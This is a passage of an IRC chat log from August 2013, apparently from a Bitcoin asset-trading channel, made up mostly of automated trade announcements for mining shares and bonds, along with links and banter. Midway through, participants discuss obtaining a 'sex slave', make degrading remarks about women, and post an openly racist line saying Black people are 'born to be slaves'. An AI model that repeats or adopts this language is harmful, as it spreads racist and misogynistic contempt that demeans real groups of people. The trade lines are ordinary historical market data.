0.00082138 = 11.5716 BTC [-] Aug 11 13:19:42 [MPEX] [S.MPOE] 7673 @ 0.0008191 = 6.285 BTC [-] Aug 11 13:20:08 [BTCTC] [BASIC-MINING] 1 @ 0.2919 BTC [-] Aug 11 13:21:16 [BTCTC] [ACTIVEMINING] 30 @ 0.005382 = 0.1615 BTC [-] Aug 11 13:21:17 [BTCTC] [ACTIVEMINING] 2 @ 0.005383 = 0.0108 BTC [+] Aug 11 13:21:18 [BTCTC] [ACTIVEMINING] 30 @ 0.005599 = 0.168 BTC [+] Aug 11 13:21:19 [BTCTC] [ACTIVEMINING] 73 @ 0.0056 = 0.4088 BTC [+] Aug 11 13:21:42 [BTCTC] [ACTIVEMINING] 1 @ 0.005599 BTC [-] Aug 11 13:27:34 https://bitcointalk.org/index.php?topic=271494.0 I love this guy Aug 11 13:27:40 FU all you trolls and doubters where are you now??????????/ Aug 11 13:29:57 wat Aug 11 13:35:54 [BTCTC] [LTC-ATF.B2] 3 @ 0.01043 = 0.0313 BTC [-] Aug 11 13:36:25 [BTCTC] [BTC-BOND] 12 @ 0.009999 = 0.12 BTC [+] Aug 11 13:39:38 lol that guty still exists ? Aug 11 13:40:04 i always suspected he was one of the chief claimants of nefario's stolen shit. Aug 11 13:40:06 [HAVELOCK] [AM100] 6 @ 0.0366 = 0.2196 BTC [+] Aug 11 13:56:21 [HAVELOCK] [SMG] 55 @ 0.0002081 = 0.0114 BTC [-] Aug 11 13:56:54 Swedish men have been warned to keep their swimwear on while bathing in the Öresund Sound off the southern coast of Sweden after a relative of the piranha was discovered in the area. Aug 11 13:57:38 [HAVELOCK] [XBOND] 10 @ 0.0010469 = 0.0105 BTC [-] Aug 11 14:07:31 [BTCTC] [LABCOIN] 1 @ 0.001288 BTC [+] Aug 11 14:07:32 [BTCTC] [LABCOIN] 115 @ 0.001288 = 0.1481 BTC [+] Aug 11 14:07:34 [BTCTC] [LABCOIN] 120 @ 0.001282 = 0.1538 BTC [-] Aug 11 14:07:35 [BTCTC] [LABCOIN] 30 @ 0.001281 = 0.0384 BTC [-] Aug 11 14:07:36 [BTCTC] [LABCOIN] 270 @ 0.00128 = 0.3456 BTC [-] Aug 11 14:07:37 [BTCTC] [LABCOIN] 111 @ 0.00127 = 0.141 BTC [-] Aug 11 14:07:38 [BTCTC] [LABCOIN] 3000 @ 0.001268 = 3.804 BTC [-] Aug 11 14:07:40 [BTCTC] [LABCOIN] 15 @ 0.001264 = 0.019 BTC [-] Aug 11 14:07:41 [BTCTC] [LABCOIN] 146 @ 0.001262 = 0.1843 BTC [-] Aug 11 14:07:42 [BTCTC] [LABCOIN] 1000 @ 0.001261 = 1.261 BTC [-] Aug 11 14:07:42 [BTCTC] [LABCOIN] 50 @ 0.001261 = 0.0631 BTC [-] Aug 11 14:07:43 [BTCTC] [LABCOIN] 125 @ 0.00126 = 0.1575 BTC [-] Aug 11 14:07:44 [BTCTC] [LABCOIN] 329 @ 0.001259 = 0.4142 BTC [-] Aug 11 14:07:45 [BTCTC] [LABCOIN] 3688 @ 0.001258 = 4.6395 BTC [-] Aug 11 14:10:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.03949 = 0.158 BTC [+] Aug 11 14:11:17 [BTCTC] [LABCOIN] 4 @ 0.0013 = 0.0052 BTC [+] Aug 11 14:15:01 [BTCTC] [LABCOIN] 4 @ 0.0013 = 0.0052 BTC [+] Aug 11 14:16:11 [BTCTC] [BTCGARDEN] 28 @ 0.01566 = 0.4385 BTC [-] Aug 11 14:16:13 [BTCTC] [BTCGARDEN] 75 @ 0.01565 = 1.1738 BTC [-] Aug 11 14:17:10 [BTCTC] [BTCGARDEN] 100 @ 0.01565 = 1.565 BTC [-] Aug 11 14:21:55 [BTCTC] [BTCGARDEN] 30 @ 0.01565 = 0.4695 BTC [-] Aug 11 14:23:26 [BTCTC] [BTCGARDEN] 1 @ 0.01589 BTC [+] Aug 11 14:24:47 [BTCTC] [DMS.SELLING] 14 @ 0.0244 = 0.3416 BTC [-] Aug 11 14:24:49 [BTCTC] [DMS.SELLING] 386 @ 0.0245 = 9.457 BTC [+] Aug 11 14:25:13 [BTCTC] [DMS.SELLING] 350 @ 0.0245 = 8.575 BTC [+] Aug 11 14:26:07 [BTCTC] [DMS.PURCHASE] 2 @ 0.02811 = 0.0562 BTC [-] Aug 11 14:29:17 that's pretty cool http://www.zerohedge.com/news/2013-08-10/bitcoin-now-officially-schrodinger-currency ... so it really is XBT, hm? Aug 11 14:30:38 [MPEX] [S.MPOE] 5000 @ 0.00082222 = 4.1111 BTC [+] Aug 11 14:30:40 [MPEX] [S.MPOE] 1300 @ 0.0008226 = 1.0694 BTC [+] Aug 11 14:36:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.03947 BTC [-] Aug 11 14:37:55 [BTCTC] [LABCOIN] 30 @ 0.001267 = 0.038 BTC [-] Aug 11 14:37:56 [BTCTC] [LABCOIN] 40 @ 0.001266 = 0.0506 BTC [-] Aug 11 14:37:58 [BTCTC] [LABCOIN] 2422 @ 0.001258 = 3.0469 BTC [-] Aug 11 14:44:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005303 = 0.1591 BTC [-] Aug 11 14:45:44 [BTCTC] [ACTIVEMINING] 35 @ 0.005303 = 0.1856 BTC [-] Aug 11 14:51:57 [BTCTC] [LABCOIN] 30 @ 0.001287 = 0.0386 BTC [+] Aug 11 14:51:58 [BTCTC] [LABCOIN] 3 @ 0.001288 = 0.0039 BTC [+] Aug 11 14:53:56 [BTCTC] [KENILWORTH] 100 @ 0.0018 = 0.18 BTC [+] Aug 11 14:55:51 [BTCTC] [ACTIVEMINING] 30 @ 0.005549 = 0.1665 BTC [+] Aug 11 14:55:53 [BTCTC] [ACTIVEMINING] 147 @ 0.00555 = 0.8159 BTC [+] Aug 11 14:59:37 [BTCTC] [LABCOIN] 30 @ 0.001271 = 0.0381 BTC [-] Aug 11 14:59:53 [BTCTC] [LABCOIN] 30 @ 0.001272 = 0.0382 BTC [+] Aug 11 15:00:00 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 11 15:00:22 [BTCTC] [LABCOIN] 30 @ 0.001272 = 0.0382 BTC [+] Aug 11 15:00:24 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001514 BTC [-] Aug 11 15:00:52 [BTCTC] [LABCOIN] 30 @ 0.001274 = 0.0382 BTC [+] Aug 11 15:00:55 [BTCTC] [LABCOIN] 53 @ 0.001273 = 0.0675 BTC [-] Aug 11 15:01:26 [HAVELOCK] [XBOND] 1 @ 0.0010469 BTC [-] Aug 11 15:03:32 [HAVELOCK] [XBOND] 2 @ 0.0010469 = 0.0021 BTC [-] Aug 11 15:07:53 [MPEX] [S.MPOE] 6700 @ 0.0008226 = 5.5114 BTC [+] Aug 11 15:09:02 [BTCTC] [BFMINES] 1 @ 0.0038 BTC [-] Aug 11 15:09:03 [BTCTC] [BFMINES] 199 @ 0.003874 = 0.7709 BTC [+] Aug 11 15:10:37 [BTCTC] [DMS.MINING] 4 @ 0.004225 = 0.0169 BTC [+] Aug 11 15:11:06 [BTCTC] [BFMINES] 338 @ 0.002501 = 0.8453 BTC [-] Aug 11 15:11:07 [BTCTC] [BFMINES] 148 @ 0.0025 = 0.37 BTC [-] Aug 11 15:12:10 [BTCTC] [BITVPS] 60 @ 0.002389 = 0.1433 BTC [+] Aug 11 15:13:34 [HAVELOCK] [XBOND] 10 @ 0.0010469 = 0.0105 BTC [-] Aug 11 15:13:47 [HAVELOCK] [XBOND] 2 @ 0.0010469 = 0.0021 BTC [-] Aug 11 15:19:14 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00155 BTC [+] Aug 11 15:21:56 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001515 BTC [-] Aug 11 15:24:21 [BTCTC] [LABCOIN] 3 @ 0.001284 = 0.0039 BTC [+] Aug 11 15:24:22 [BTCTC] [LABCOIN] 30 @ 0.001285 = 0.0386 BTC [+] Aug 11 15:24:24 [BTCTC] [LABCOIN] 8 @ 0.0013 = 0.0104 BTC [+] Aug 11 15:24:24 [BTCTC] [LABCOIN] 66 @ 0.001301 = 0.0859 BTC [+] Aug 11 15:24:25 [BTCTC] [LABCOIN] 3 @ 0.001302 = 0.0039 BTC [+] Aug 11 15:24:26 [BTCTC] [LABCOIN] 25 @ 0.001303 = 0.0326 BTC [+] Aug 11 15:24:27 [BTCTC] [LABCOIN] 2 @ 0.001307 = 0.0026 BTC [+] Aug 11 15:24:28 [BTCTC] [LABCOIN] 21 @ 0.001308 = 0.0275 BTC [+] Aug 11 15:24:29 [BTCTC] [LABCOIN] 57 @ 0.001309 = 0.0746 BTC [+] Aug 11 15:24:30 [BTCTC] [LABCOIN] 408 @ 0.00131 = 0.5345 BTC [+] Aug 11 15:24:31 [BTCTC] [LABCOIN] 90 @ 0.001311 = 0.118 BTC [+] Aug 11 15:24:32 [BTCTC] [LABCOIN] 36 @ 0.001311 = 0.0472 BTC [+] Aug 11 15:24:32 [BTCTC] [LABCOIN] 100 @ 0.001312 = 0.1312 BTC [+] Aug 11 15:24:34 [BTCTC] [LABCOIN] 200 @ 0.001313 = 0.2626 BTC [+] Aug 11 15:24:35 [BTCTC] [LABCOIN] 12 @ 0.001313 = 0.0158 BTC [+] Aug 11 15:24:36 [BTCTC] [LABCOIN] 100 @ 0.001314 = 0.1314 BTC [+] Aug 11 15:24:37 [BTCTC] [LABCOIN] 42 @ 0.00132 = 0.0554 BTC [+] Aug 11 15:24:38 [BTCTC] [LABCOIN] 30 @ 0.00132 = 0.0396 BTC [+] Aug 11 15:24:39 [BTCTC] [LABCOIN] 64 @ 0.00132 = 0.0845 BTC [+] Aug 11 15:25:13 [BTCTC] [LABCOIN] 30 @ 0.001282 = 0.0385 BTC [-] Aug 11 15:26:28 [BTCTC] [ACTIVEMINING] 6 @ 0.005467 = 0.0328 BTC [-] Aug 11 15:26:33 [BTCTC] [ACTIVEMINING] 11 @ 0.005468 = 0.0601 BTC [+] Aug 11 15:28:35 [BTCTC] [DMS.MINING] 16 @ 0.004225 = 0.0676 BTC [+] Aug 11 15:28:37 [BTCTC] [LABCOIN] 10 @ 0.001315 = 0.0132 BTC [+] Aug 11 15:28:38 [BTCTC] [LABCOIN] 19 @ 0.001316 = 0.025 BTC [+] Aug 11 15:28:40 [BTCTC] [LABCOIN] 61 @ 0.001317 = 0.0803 BTC [+] Aug 11 15:28:41 [BTCTC] [LABCOIN] 10 @ 0.00132 = 0.0132 BTC [+] Aug 11 15:29:14 [BTCTC] [BTCGARDEN] 6 @ 0.01589 = 0.0953 BTC [+] Aug 11 15:29:15 [BTCTC] [BTCGARDEN] 14 @ 0.0159 = 0.2226 BTC [+] Aug 11 15:32:44 [BTCTC] [LABCOIN] 100 @ 0.00132 = 0.132 BTC [+] Aug 11 15:32:45 [BTCTC] [LABCOIN] 500 @ 0.001321 = 0.6605 BTC [+] Aug 11 15:32:46 [BTCTC] [LABCOIN] 300 @ 0.001322 = 0.3966 BTC [+] Aug 11 15:32:48 [BTCTC] [LABCOIN] 1 @ 0.001328 BTC [+] Aug 11 15:32:48 [BTCTC] [LABCOIN] 19 @ 0.001329 = 0.0253 BTC [+] Aug 11 15:32:49 [BTCTC] [LABCOIN] 1 @ 0.001329 BTC [+] Aug 11 15:32:50 [BTCTC] [LABCOIN] 79 @ 0.00133 = 0.1051 BTC [+] Aug 11 15:33:19 [BTCTC] [LABCOIN] 30 @ 0.00133 = 0.0399 BTC [+] Aug 11 15:34:25 [BTCTC] [LABCOIN] 5 @ 0.001329 = 0.0066 BTC [-] Aug 11 15:37:28 [BTCTC] [LABCOIN] 5 @ 0.001329 = 0.0066 BTC [-] Aug 11 15:37:28 TypeError: can't multiply sequence by non-int of type 'float' (file "/app/Coinflow/exchanges/models.py", line 57, in send_to_redis) Aug 11 15:37:29 [BTCTC] [LABCOIN] 44 @ 0.00133 = 0.0585 BTC [+] Aug 11 15:37:30 [BTCTC] [LABCOIN] 58 @ 0.001334 = 0.0774 BTC [+] Aug 11 15:37:30 TypeError: can't multiply sequence by non-int of type 'float' (file "/app/Coinflow/exchanges/models.py", line 57, in send_to_redis) Aug 11 15:37:31 [BTCTC] [LABCOIN] 393 @ 0.001335 = 0.5247 BTC [+] Aug 11 15:37:32 TypeError: can't multiply sequence by non-int of type 'float' (file "/app/Coinflow/exchanges/models.py", line 57, in send_to_redis) Aug 11 15:37:34 TypeError: can't multiply sequence by non-int of type 'float' (file "/app/Coinflow/exchanges/models.py", line 57, in send_to_redis) Aug 11 15:37:40 damn Aug 11 15:39:35 [HAVELOCK] [XBOND] 4 @ 0.0010469 = 0.0042 BTC [-] Aug 11 15:40:56 [HAVELOCK] [XBOND] 1 @ 0.0010469 BTC [-] Aug 11 15:41:00 [BTCTC] [LABCOIN] 9 @ 0.001334 = 0.012 BTC [-] Aug 11 15:41:01 [BTCTC] [LABCOIN] 73 @ 0.001335 = 0.0975 BTC [+] Aug 11 15:41:02 [BTCTC] [LABCOIN] 75 @ 0.001338 = 0.1004 BTC [+] Aug 11 15:41:03 [BTCTC] [LABCOIN] 300 @ 0.001339 = 0.4017 BTC [+] Aug 11 15:41:04 [BTCTC] [LABCOIN] 300 @ 0.001339 = 0.4017 BTC [+] Aug 11 15:47:06 [BTCTC] [TAT.MINIGAME] 4 @ 0.0002412 = 0.001 BTC [+] Aug 11 15:47:34 [BTCTC] [BITVPS] 1 @ 0.002003 BTC [-] Aug 11 15:48:55 [BTCTC] [DMS.PURCHASE] 102 @ 0.02811 = 2.8672 BTC [-] Aug 11 15:49:17 [BTCTC] [TAT.ASICMINER] 19 @ 0.03843 = 0.7302 BTC [-] Aug 11 15:49:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.03842 = 0.1537 BTC [-] Aug 11 15:49:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.03841 = 0.3841 BTC [-] Aug 11 15:49:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.03801 = 0.076 BTC [-] Aug 11 15:49:22 [BTCTC] [TAT.ASICMINER] 12 @ 0.038 = 0.456 BTC [-] Aug 11 15:49:23 [BTCTC] [TAT.ASICMINER] 6 @ 0.03794 = 0.2276 BTC [-] Aug 11 15:49:24 [BTCTC] [TAT.ASICMINER] 33 @ 0.03793 = 1.2517 BTC [-] Aug 11 15:49:34 [HAVELOCK] [AM100] 10 @ 0.0367 = 0.367 BTC [+] Aug 11 15:49:37 [HAVELOCK] [AM100] 39 @ 0.0368 = 1.4352 BTC [+] Aug 11 15:49:39 [HAVELOCK] [AM100] 3 @ 0.0369 = 0.1107 BTC [+] Aug 11 15:49:41 [HAVELOCK] [AM100] 2 @ 0.03698799 = 0.074 BTC [+] Aug 11 15:49:43 [HAVELOCK] [AM100] 32 @ 0.036988 = 1.1836 BTC [+] Aug 11 15:50:52 [BTCTC] [ASICMINER-PT] 1 @ 3.859 BTC [+] Aug 11 15:54:57 [BTCTC] [DMS.MINING] 102 @ 0.004225 = 0.431 BTC [+] Aug 11 15:55:53 [MPEX] [S.MPOE] 7018 @ 0.0008226 = 5.773 BTC [+] Aug 11 15:56:39 http://coinflow.co/livetrades/ Aug 11 15:56:40 Django Server Sent Events - Test Aug 11 15:57:06 I should probably rename that Aug 11 15:57:10 [BTCTC] [BTCGARDEN] 4 @ 0.01589 = 0.0636 BTC [-] Aug 11 15:57:10 [BTCTC] [BTCGARDEN] 36 @ 0.0159 = 0.5724 BTC [+] Aug 11 15:57:12 [BTCTC] [BTCGARDEN] 11 @ 0.01591 = 0.175 BTC [+] Aug 11 15:57:13 [BTCTC] [BTCGARDEN] 50 @ 0.01592 = 0.796 BTC [+] Aug 11 15:57:55 [BTCTC] [BTCGARDEN] 15 @ 0.01592 = 0.2388 BTC [+] Aug 11 16:04:02 [BTCTC] [LABCOIN] 50 @ 0.001333 = 0.0667 BTC [-] Aug 11 16:04:04 [BTCTC] [LABCOIN] 50 @ 0.00132 = 0.066 BTC [-] Aug 11 16:04:05 [BTCTC] [LABCOIN] 20 @ 0.001314 = 0.0263 BTC [-] Aug 11 16:04:06 [BTCTC] [LABCOIN] 13 @ 0.001306 = 0.017 BTC [-] Aug 11 16:04:08 [BTCTC] [LABCOIN] 150 @ 0.001305 = 0.1958 BTC [-] Aug 11 16:04:09 [BTCTC] [LABCOIN] 106 @ 0.001291 = 0.1368 BTC [-] Aug 11 16:04:10 [BTCTC] [LABCOIN] 461 @ 0.00129 = 0.5947 BTC [-] Aug 11 16:08:43 [MPEX] [S.MPOE] 9782 @ 0.0008226 = 8.0467 BTC [+] Aug 11 16:09:29 [BTCTC] [DMS.MINING] 4 @ 0.004225 = 0.0169 BTC [+] Aug 11 16:12:34 http://www.reddit.com/r/Bitcoin/comments/1k50oc/why_mp_is_your_god/ Aug 11 16:12:46 teh reddit delivers. Aug 11 16:12:46 [MPEX] [S.MPOE] 7536 @ 0.00082046 = 6.183 BTC [-] Aug 11 16:12:56 [BTCTC] [BTCGARDEN] 13 @ 0.01591 = 0.2068 BTC [-] Aug 11 16:12:57 [BTCTC] [BTCGARDEN] 11 @ 0.01592 = 0.1751 BTC [+] Aug 11 16:12:58 [BTCTC] [BTCGARDEN] 50 @ 0.01593 = 0.7965 BTC [+] Aug 11 16:12:59 [BTCTC] [BTCGARDEN] 50 @ 0.01594 = 0.797 BTC [+] Aug 11 16:13:01 [BTCTC] [BTCGARDEN] 11 @ 0.01594 = 0.1753 BTC [+] Aug 11 16:13:02 [BTCTC] [BTCGARDEN] 50 @ 0.01595 = 0.7975 BTC [+] Aug 11 16:13:03 [BTCTC] [BTCGARDEN] 15 @ 0.01596 = 0.2394 BTC [+] Aug 11 16:16:06 nice prostitextuarea-1.jpg Aug 11 16:16:36 Diablo-D3 ftw. Aug 11 16:16:54 funny to see all teh butthurt noobs being all butthurt on reddit. Aug 11 16:17:05 mircea_popescu: I still dont see the point of reddit =/ Aug 11 16:17:22 all the subreddits Im following report news long after Ive already seen it elsewhere Aug 11 16:17:29 I upvoted Aug 11 16:17:29 mircea_popescu: get a haircut Aug 11 16:17:58 Diablo-D3 that's exactly the point of reddit. where's that drawing of the ass eating ? Aug 11 16:18:07 [BTCTC] [LTC-ATF.B2] 1 @ 0.01014 BTC [-] Aug 11 16:18:07 Scrat in the picture you mean ? Aug 11 16:18:16 the point of reddit is karma whoring Aug 11 16:18:27 you get numbers, like bitcoins Aug 11 16:18:28 pankkake: dude, I karma whore enough on hn to fill 3 reddits. Aug 11 16:18:44 14:56.35 ( parseval ) http://coinflow.co/livetrades/ < - preety neat Aug 11 16:18:57 hacker news is way too hipster for me - at least with reddit I can select Aug 11 16:18:59 pankkake: best part is, I dont even know why I get karma on hn Aug 11 16:19:05 well yes Aug 11 16:19:12 would never belive that so much stuff would get built on top of assbot Aug 11 16:19:15 like, shit Ive linked to that I thought was interesting gets upvoted Aug 11 16:19:19 but Aug 11 16:19:26 shit I think would get upvoted never gets upvoted Aug 11 16:19:58 [BTCTC] [BTC-BOND] 2 @ 0.0099 = 0.0198 BTC [-] Aug 11 16:20:10 if you want to get upvoted, say "I'm going to be downvoted for this" before Aug 11 16:20:14 it works every time Aug 11 16:20:59 pankkake: no Aug 11 16:21:04 on hn you get downvoted for that Aug 11 16:21:07 Ive actually tried it Aug 11 16:21:12 since it works so well on reddit Aug 11 16:21:15 kakobrekla it has a nice wide ass so... Aug 11 16:21:48 takes it by the creator or smth Aug 11 16:21:54 mircea_popescu: okay Aug 11 16:21:57 I want your honest opinion Aug 11 16:22:00 anyway, here Aug 11 16:22:04 's what reddit is for : "What's the rudest or meanest thing a stranger has said to you that still bothers you today?" Aug 11 16:22:08 I have no money Aug 11 16:22:13 I have no useful skills Aug 11 16:22:26 I can cook manly foods Aug 11 16:22:36 I have a 7 inch dick. Aug 11 16:22:48 are you asking if you should become a tranny? Aug 11 16:23:01 mircea_popescu: do I have any chance of getting a sex slave based on these facts? Aug 11 16:23:07 nope. Aug 11 16:23:16 how old are you ? Aug 11 16:23:22 in a few months 30. Aug 11 16:23:32 a, well, that's to be expected then. Aug 11 16:23:48 what you do is you go find yourself a mistress. preferably one you enjoy taking it from. Aug 11 16:24:06 mircea_popescu: yeah, see, thats not really my thing. Aug 11 16:24:07 by the time you're 40 you'll likely have skills and a decent shot of getting a sex slave if you're still so inclined. Aug 11 16:24:13 I stupidly let go a girl that had the potential to become my/a sex slave :( Aug 11 16:24:22 the reason you don't stand a chance it's specifically because you misrepresent what "things" are. Aug 11 16:24:45 pankkake perhaps not so stupidly. if you dunno what you're doing you'll just badly huirt both of you. Aug 11 16:27:51 [HAVELOCK] [XBOND] 15 @ 0.0010469 = 0.0157 BTC [-] Aug 11 16:28:40 mircea_popescu: I mean, having an actual wife, it just doesnt seem worth the trouble Aug 11 16:28:59 http://trilema.com/wp-content/uploads/2011/12/prostitextuarea-1.jpg wtf Aug 11 16:29:08 Diablo-D3 wife ? what wife. Aug 11 16:29:15 I was certainly naïve and inexperienced at the time Aug 11 16:29:27 mircea_popescu: having a wife instead of a sex slave Aug 11 16:29:31 just think about it : the chick that'll eventually be your sex slave ALSO probably thinks "that's not really her thing" currently. Aug 11 16:30:23 [MPEX] [S.MPOE] 2300 @ 0.00081953 = 1.8849 BTC [-] Aug 11 16:31:18 certainly Aug 11 16:31:39 but most women I meet will never be Aug 11 16:31:59 pankkake that was directed at him :p Aug 11 16:32:23 [HAVELOCK] [XBOND] 10 @ 0.00104689 = 0.0105 BTC [-] Aug 11 16:32:52 [BTCTC] [LABCOIN] 150 @ 0.001344 = 0.2016 BTC [+] Aug 11 16:32:53 [BTCTC] [LABCOIN] 1000 @ 0.001345 = 1.345 BTC [+] Aug 11 16:32:54 [BTCTC] [LABCOIN] 200 @ 0.001345 = 0.269 BTC [+] Aug 11 16:33:01 mircea_popescu: what Im saying is, wives just cause problems for most men Aug 11 16:33:03 also i just realised how this entire discussion is strangely ontopic, seeing how slaves are assets. Aug 11 16:33:14 sure, but it applies to both our societies I guess Aug 11 16:33:29 I need to find myself a nice eastern european girl :p Aug 11 16:33:46 I dont even care what color she is Aug 11 16:33:49 even if shes black Aug 11 16:34:03 blacks are born to be slaves anyway Aug 11 16:34:04 if she can keep her mouth shut, not piss me off, and suck my dick Aug 11 16:34:09 imo mericans are easier to start. lotta preconceptions in eastern yurp. Aug 11 16:34:10 I really dont care. Aug 11 16:34:10 but I meant culturally Aug 11 16:34:36 [HAVELOCK] [XBOND] 10 @ 0.0010468 = 0.0105 BTC [-] Aug 11 16:35:56 that girl was the kind to beg you to let her suck your dick Aug 11 16:35:58 fuck :( Aug 11 16:37:46 and now I'm going to be late Aug 11 16:37:51 later. Aug 11 16:40:45 [HAVELOCK] [AM100] 3 @ 0.036987 = 0.111 BTC [-] Aug 11 16:40:55 [HAVELOCK] [XBOND] 20 @ 0.001043 = 0.0209 BTC [-] Aug 11 16:41:17 [HAVELOCK] [XBOND] 20 @ 0.0010429 = 0.0209 BTC [-] Aug 11 16:42:37 [BTCTC] [LABCOIN] 30 @ 0.001331 = 0.0399 BTC [-] Aug 11 16:42:39 [BTCTC] [LABCOIN] 20 @ 0.00133 = 0.0266 BTC [-] Aug 11 16:42:40 [BTCTC] [LABCOIN] 50 @ 0.001328 = 0.0664 BTC [-] Aug 11 16:43:24 [HAVELOCK] [XBOND] 5 @ 0.0010429 = 0.0052 BTC [-] Aug 11 16:43:39 [HAVELOCK] [AM100] 1 @ 0.0369 BTC [-] Aug 11 16:44:04 [HAVELOCK] [XBOND] 3 @ 0.0010429 = 0.0031 BTC [-] Aug 11 16:47:59 [HAVELOCK] [XBOND] 115 @ 0.0010429 = 0.1199 BTC [-] Aug 11 16:48:12 [HAVELOCK] [XBOND] 5 @ 0.0010469 = 0.0052 BTC [+] Aug 11 16:50:05 [HAVELOCK] [XBOND] 2721 @ 0.001047 = 2.8489 BTC [+] Aug 11 16:51:16 [HAVELOCK] [XBOND] 1 @ 0.001047 BTC [+] Aug 11 16:51:20 [BTCTC] [LABCOIN] 50 @ 0.001325 = 0.0663 BTC [-] Aug 11 16:51:21 [BTCTC] [LABCOIN] 20 @ 0.00132 = 0.0264 BTC [-] Aug 11 16:52:30 [BTCTC] [LABCOIN] 26 @ 0.001319 = 0.0343 BTC [-] Aug 11 16:52:31 [BTCTC] [LABCOIN] 2 @ 0.001338 = 0.0027 BTC [+] Aug 11 16:52:32 [BTCTC] [LABCOIN] 20 @ 0.001339 = 0.0268 BTC [+] Aug 11 16:52:34 [BTCTC] [LABCOIN] 37 @ 0.001349 = 0.0499 BTC [+] Aug 11 16:52:34 [BTCTC] [LABCOIN] 300 @ 0.00135 = 0.405 BTC [+] Aug 11 16:52:39 [BTCTC] [LABCOIN] 30 @ 0.00135 = 0.0405 BTC [+] Aug 11 16:57:32 [BTCTC] [NASTY-PT] 15 @ 0.00414 = 0.0621 BTC [+] Aug 11 16:57:41 [BTCTC] [BTCGARDEN] 5 @ 0.01595 = 0.0798 BTC [-] Aug 11 16:58:15 [BTCTC] [BTCGARDEN] 1 @ 0.01595 BTC [-] Aug 11 16:58:25 [MPEX] [S.MPOE] 11564 @ 0.00082019 = 9.4847 BTC [+] Aug 11 16:58:27 [MPEX] [S.MPOE] 7600 @ 0.00082434 = 6.265 BTC [+] Aug 11 16:58:28 [MPEX] [S.MPOE] 10200 @ 0.00082548 = 8.4199 BTC [+] Aug 11 16:58:30 [MPEX] [S.MPOE] 21996 @ 0.00082736 = 18.1986 BTC [+] Aug 11 16:58:41 [MPEX] [S.MPOE] 1079 @ 0.00082753 = 0.8929 BTC [+] Aug 11 17:00:30 [HAVELOCK] [XBOND] 1 @ 0.001047 BTC [+] Aug 11 17:00:51 https://bitcointalk.org/index.php?topic=271771.msg1521109;topicseen#new Aug 11 17:00:56 [BTC-TC][IPO]ASICME-Our Conquest Is the Sea of Stars Aug 11 17:01:18 [BTCTC] [BTCGARDEN] 3 @ 0.01595 = 0.0479 BTC [-] Aug 11 17:02:28 ASICME: name of our team and our stock ticker. ASICME is a portmanteau of ASIC and ME, where ME is an abbreviation for Meet End. Aug 11 17:02:28 MeetEnd: name of our company, which is also the listed entity of this IPO. The words "Meet" and "End" are from our slogan "we will Meet in the End with Bitcoin." Aug 11 17:02:29 clearly. Aug 11 17:03:38 180k market value Aug 11 17:03:42 like robbers afte ra bank heist? Aug 11 17:03:53 we will meet in the end with bitcoin Aug 11 17:04:28 well, here's the good news : the retard competition is simply devaluing the whiole thing. Aug 11 17:04:32 The account also bought the 5-coin donator status Aug 11 17:05:19 [BTCTC] [BTCGARDEN] 35 @ 0.01596 = 0.5586 BTC [+] Aug 11 17:06:14 [BTCTC] [BTCGARDEN] 7 @ 0.01596 = 0.1117 BTC [+] Aug 11 17:08:15 [BTCTC] [BTCGARDEN] 9 @ 0.01596 = 0.1436 BTC [+] Aug 11 17:11:46 https://bitcointalk.org/index.php?topic=271786.new#new Aug 11 17:11:49 Title: Translation Romanian -> English. 330 words, 1 BTC. Aug 11 17:14:57 [BTCTC] [DMS.SELLING] 2 @ 0.02449 = 0.049 BTC [-] Aug 11 17:19:13 [BTCTC] [COGNITIVE] 10 @ 0.3305 = 3.305 BTC [-] Aug 11 17:20:29 [BTCTC] [LABCOIN] 20 @ 0.001335 = 0.0267 BTC [-] Aug 11 17:20:32 [BTCTC] [LABCOIN] 50 @ 0.001333 = 0.0667 BTC [-] Aug 11 17:21:09 [10:02:30] ASICME: name of our team and our stock ticker. ASICME is a portmanteau of ASIC and ME, where ME is an abbreviation for Meat End. Aug 11 17:21:12 ftfy Aug 11 17:21:25 lol Aug 11 17:21:31 [BTCTC] [DMS.PURCHASE] 90 @ 0.02811 = 2.5299 BTC [-] Aug 11 17:21:55 [BTCTC] [LABCOIN] 20 @ 0.001333 = 0.0267 BTC [-] Aug 11 17:23:08 [HAVELOCK] [XBOND] 215 @ 0.001047 = 0.2251 BTC [+] Aug 11 17:23:10 [BTCTC] [LABCOIN] 30 @ 0.001325 = 0.0398 BTC [-] Aug 11 17:23:12 [BTCTC] [LABCOIN] 200 @ 0.001324 = 0.2648 BTC [-] Aug 11 17:23:13 [BTCTC] [LABCOIN] 970 @ 0.001323 = 1.2833 BTC [-] Aug 11 17:23:33 [BTCTC] [BTC-TRADING-PT] 3 @ 0.69 = 2.07 BTC [-] Aug 11 17:23:49 [BTCTC] [COGNITIVE] 3 @ 0.3222 = 0.9666 BTC [-] Aug 11 17:23:50 [BTCTC] [COGNITIVE] 2 @ 0.3219 = 0.6438 BTC [-] Aug 11 17:24:42 [BTCTC] [LABCOIN] 30 @ 0.001327 = 0.0398 BTC [+] Aug 11 17:25:09 [BTCTC] [ESECURITYSABTC] 1 @ 0.2353 BTC [+] Aug 11 17:25:14 [BTCTC] [ESECURITYSABTC] 1 @ 0.2353 BTC [+] Aug 11 17:25:52 [BTCTC] [ESECURITYSABTC] 1 @ 0.2352 BTC [-] Aug 11 17:26:17 [BTCTC] [LABCOIN] 20 @ 0.001327 = 0.0265 BTC [+] Aug 11 17:26:30 [BTCTC] [ESECURITYSABTC] 1 @ 0.23 BTC [-] Aug 11 17:27:53 [BTCTC] [MININGCO.ETF] 1 @ 1.1 BTC [-] Aug 11 17:28:12 https://bitcointalk.org/index.php?topic=245968.0 Aug 11 17:28:19 Our Conquest is the sea of stars Aug 11 17:28:57 [BTCTC] [LABCOIN] 2 @ 0.00134 = 0.0027 BTC [+] Aug 11 17:28:57 [BTCTC] [LABCOIN] 20 @ 0.001341 = 0.0268 BTC [+] Aug 11 17:28:58 [BTCTC] [LABCOIN] 3 @ 0.001342 = 0.004 BTC [+] Aug 11 17:29:00 [BTCTC] [LABCOIN] 25 @ 0.001343 = 